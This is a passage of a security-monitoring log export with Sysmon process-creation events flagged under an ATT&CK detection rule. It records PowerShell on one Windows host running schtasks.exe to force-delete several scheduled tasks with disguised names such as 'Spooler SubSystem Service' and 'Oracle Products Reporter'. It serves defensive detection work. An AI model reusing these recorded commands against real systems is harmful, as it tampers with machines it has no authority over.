4680 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.003071900Z"",""eventRecordID"":""2485"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.000\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010337b1e00}\r\nProcessId: 4680\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.000"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010337b1e00}"",""processId"":""4680"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.014",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.975 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001064791e00} +ProcessId: 6308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.983225600Z"",""eventRecordID"":""2484"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.975\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001064791e00}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.975"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001064791e00}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.979",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.940 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b2771e00} +ProcessId: 3812 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.946887000Z"",""eventRecordID"":""2483"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.940\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b2771e00}\r\nProcessId: 3812\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:03.940"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010b2771e00}"",""processId"":""3812"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.964",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.900 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-00101b761e00} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.903400200Z"",""eventRecordID"":""2482"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.900\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-00101b761e00}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.900"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-00101b761e00}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.932",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.870 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-00108a741e00} +ProcessId: 7272 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.873203600Z"",""eventRecordID"":""2481"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.870\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-00108a741e00}\r\nProcessId: 7272\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.870"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-00108a741e00}"",""processId"":""7272"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.916",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: 
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.841
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010c7721e00}
+ProcessId: 2128
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.843377600Z"",""eventRecordID"":""2480"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.841\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010c7721e00}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.841"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010c7721e00}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.902",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.806
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010d8701e00}
+ProcessId: 7984
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
